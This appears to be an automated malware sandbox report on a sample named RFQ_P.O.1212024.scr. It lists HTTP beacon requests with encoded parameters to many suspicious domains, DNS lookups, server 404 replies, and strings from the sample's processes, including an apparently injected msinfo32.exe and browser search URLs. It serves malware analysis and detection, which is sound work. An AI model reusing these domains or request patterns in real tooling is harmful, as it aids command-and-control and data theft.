                Source: global trafficHTTP traffic detected: GET /1yxc/?x4=sNv20zOiDYMkOMIZUAMTdfOFf2lUUMo2G3KMZ1n3ZrvJqNyjokS5weFlZhKtUuMXj8jBQ4ipfeoXnmxfx9jFO8nPHTBXwG0erHwEdD0EmkjwsdzIUyNTuEGbdIq/&e2E=wRQ8oHXx HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXx HTTP/1.1Host: www.mrpokrovskii.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /zu0o/?x4=b+T4d2yBdzwUctMejPOupP2kAcsd/nhPUeEaq4sP5cuMDP5lcr7xps31yZ0v/SBMA/DffJ2wWiPafQM+LvQwNtI7bwedqUnBbu8V9j+TNLUtBYOc7+oiqpinqR9T&e2E=wRQ8oHXx HTTP/1.1Host: www.kvsj.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /n8su/?e2E=wRQ8oHXx&x4=lFR6PBva/PMsONRXI0WwK0wAlPs3/3LGo4dEt9E07rmpJDSADrt1oQ5wEpxa5wprSOBn2CzJO8jS1Mfo/039O8MFhYDOYZlyw2UFRkURX7D2yJawivbRUB3rqqzd HTTP/1.1Host: www.learniit.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /an5q/?x4=ht9kvQ/be1JP/b8GmoJbUpka8BxXZHDjKA2fsfIfXx0uGnoFDxCnuQ2Syamf2AV1LytjWJjmrwJ3QA9mKPa/MpeqH9CIj747RQUAZUa71OOzgLnsSxYrvroJ5BNI&e2E=wRQ8oHXx HTTP/1.1Host: www.bankseedz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ugyg/?x4=oCZiSXk+P+GRfK1BPGYe2jAbGy6NfuRnUXBBKsmFkR5XdaXHzOV8cRyPm0SlplEQyKXzoexQZCmJiHD77mrvft/NmZQ5KxY7IzFSGPZt8SE9dF3swuxanCIPkslF&e2E=wRQ8oHXx HTTP/1.1Host: www.dietcoffee.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /m1g9/?x4=Cu+laRdL4iPyeXPOvnXbHATCRLbFtZvgmbFpChU/EeiHg3j+sEFT+StkZuqTMzkW17xuxTA+IyjM3SxoNr0bNIrAJ4iZv6YB/kmuH0GNS74UnHLgt4utBlkurB62&e2E=wRQ8oHXx HTTP/1.1Host: www.smartcongress.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8mom/?e2E=wRQ8oHXx&x4=v3XpYZPN786X74upleiKtnNLTnr+c+QwOZfu2m4ZpmP7p96MXgDDhh7sLakM2W7qG0VyTnNwFXquJXbjGrCq/za7/jRofJkRFgfW/Ij12v4wAiV6r71IBPX8JcSc HTTP/1.1Host: www.carsten.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /5p01/?x4=gA6TElZrCKVvAudJqCgIj+rDW60O9S/KrsL6QppRHZfK3DYPsJvxk4hrjtesZ+QJ9tNiW026ZluxU0disiqWvA+4TRd5XHrMIpgHSW93WHtTmPUKepAYQ6lEihd3&e2E=wRQ8oHXx HTTP/1.1Host: www.krshop.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /k6bb/?e2E=wRQ8oHXx&x4=Z6Ib5suwfioT2MqU06AO+PAui2zXunW520tiYNnV3r2mKqn+I/1Rk8X6nyOI9yPQWIZ7sVBW06SOuYuNHwSa/K8QYKA8w9Q0BnY6RfjXUsKFmlTp4Coq9mQ/L3NZ HTTP/1.1Host: www.rysanekbeton.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gvzg/?x4=3ZtrxXVK8OpQj/IeinJ3ZiXeAcGxlO+Pqtakmq6NsaDAWPHTfqsTTp3MR0RJjMVggAZP9MES5OMDJz4L+ZnM27rh6ujY7a8DVehBMFx021rrXiLY5F9HpwIHbLcF&e2E=wRQ8oHXx HTTP/1.1Host: www.airrelax.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ge5i/?x4=jPU0HPuwZISEZ5CnqmUb1HxQcmHsEJWSHx9v/3j//xH9iOmom18fULHPXhZRerzvXxOw9xjpncAMgCVYCBSLizB0ok2+/BrdQFUexat22mesfNVGJAdc0xNIeHt8&e2E=wRQ8oHXx HTTP/1.1Host: www.vayui.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.zoiheat.xyz
                Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
                Source: global trafficDNS traffic detected: DNS query: www.questmatch.pro
                Source: global trafficDNS traffic detected: DNS query: www.mrpokrovskii.pro
                Source: global trafficDNS traffic detected: DNS query: www.sodatool.site
                Source: global trafficDNS traffic detected: DNS query: www.tb0.shop
                Source: global trafficDNS traffic detected: DNS query: www.kvsj.net
                Source: global trafficDNS traffic detected: DNS query: www.learniit.info
                Source: global trafficDNS traffic detected: DNS query: www.bankseedz.info
                Source: global trafficDNS traffic detected: DNS query: www.dietcoffee.online
                Source: global trafficDNS traffic detected: DNS query: www.smartcongress.net
                Source: global trafficDNS traffic detected: DNS query: www.carsten.studio
                Source: global trafficDNS traffic detected: DNS query: www.krshop.shop
                Source: global trafficDNS traffic detected: DNS query: www.rysanekbeton.cloud
                Source: global trafficDNS traffic detected: DNS query: www.airrelax.shop
                Source: global trafficDNS traffic detected: DNS query: www.vayui.top
                Source: global trafficDNS traffic detected: DNS query: www.diozusemails.buzz
                Source: unknownHTTP traffic detected: POST /1yxc/ HTTP/1.1Host: www.questmatch.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.questmatch.proReferer: http://www.questmatch.pro/1yxc/Content-Length: 2159Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 12 Dec 2024 09:20:15 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-12T09:20:20.7730248Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:32 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:44 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:47 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:50 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 09:21:52 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 09:21:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 09:22:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 09:22:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 09:22:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 564 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Thu, 12 Dec 2024 09:22:14 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Thu, 12 Dec 2024 09:22:16 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Thu, 12 Dec 2024 09:22:19 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Thu, 12 Dec 2024 09:22:22 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Thu, 12 Dec 2024 09:22:29 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Thu, 12 Dec 2024 09:22:31 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Thu, 12 Dec 2024 09:22:34 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Thu, 12 Dec 2024 09:22:36 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 12 Dec 2024 09:23:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 12 Dec 2024 09:23:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 12 Dec 2024 09:23:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 12 Dec 2024 09:23:21 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 12 Dec 2024 09:23:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiFVU4h0fkkU8Pefzot4px3xPyk0Mp7u6Q2EojwrvNTgIo3223LnSwzYfZI3f1EnvaipqjCnUVci%2FP7WTODlFrLX3FnXqePhaIaP6IIljAaBt49elFE2mjYIL64W%2FWAA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0ca843aeda4269-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2322&min_rtt=2322&rtt_var=1161&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2757&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 12 Dec 2024 09:23:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSwgAPS8SaycOJ1sORdTduPG3AcX16aUGES9tKRy2V9o0ptbx5UcojZr7ZVbAoEOl9njSD%2B8FpeYx4T3hU7y18QF32GKkSrA9RkhcXzf6dEaPJkykgmK8Qn1r1I9kYfk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0ca856dc487ce2-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2031&rtt_var=1015&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=796&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 12 Dec 2024 09:23:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gG60QB2uE%2BTi7h7ygzN2wL0kEKf80yQ2CHDyamVOVtC0m7SKsJzqznpr9MXugXfny%2FuKle6Q0yboNKAFIfb1NCUoHM0wuCU2VAiSpMlAd%2BfV%2BE4ZMN8QNjPZ07ha8Ym"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0ca867883a5e80-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2055&min_rtt=2055&rtt_var=1027&sent=3&recv=6&lost=0&retrans=0&sent_bytes=0&recv_bytes=4221&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 12 Dec 2024 09:23:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZ5J7MLtGi6nVmwyiMeJvh6yBddV2nShL4yljVGYh9FTAStbNL4YKeTdwO66%2FN2EzvovszjHDDLlYdIAfKECZsUyxklYrAE5oSBjmfDPGhbsfhryAuhZTFt3pglVxSEm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f0ca8781d168c72-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1924&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pa
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
                Source: RFQ_P.O.1212024.scr, 00000000.00000002.373003710.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RFQ_P.O.1212024.scr, 00000000.00000002.373003710.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, PEJmengI.exe, 0000000A.00000002.417275627.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, PEJmengI.exe, 0000000A.00000002.417275627.0000000002631000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: msinfo32.exe, 0000000C.00000002.874652822.0000000061EB2000.00000008.00000001.01000000.0000000C.sdmp, sqlite3.dll.12.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: mrNbohrgjTw.exe, 00000014.00000002.873703699.0000000000954000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.vayui.top
                Source: mrNbohrgjTw.exe, 00000014.00000002.873703699.0000000000954000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.vayui.top/ge5i/
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: msinfo32.exe, 0000000C.00000002.873979376.0000000003610000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.0000000003A70000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://code.jquery.com/jquery-3.5.1.min.js
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://gamesfunny.top$
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://playchill.top/api/axgames/request?domain=$
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: msinfo32.exe, 0000000C.00000003.447877758.0000000006150000.00000004.00000020.00020000.00000000.sdmp, 00255Of2.12.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: msinfo32.exe, 0000000C.00000002.874345553.0000000005300000.00000004.00000800.00020000.00000000.sdmp, msinfo32.exe, 0000000C.00000002.873979376.000000000410E000.00000004.10000000.00040000.00000000.sdmp, mrNbohrgjTw.exe, 00000014.00000002.873893935.000000000456E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://securepubads.g.doubleclick.net/tag/js/gpt.js
                Source: RFQ_P.O.1212024.scr, PEJmengI.exe.0.dr String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: 00255Of2.12.dr String found in binary or memory: https://www.google.com/favicon.ico
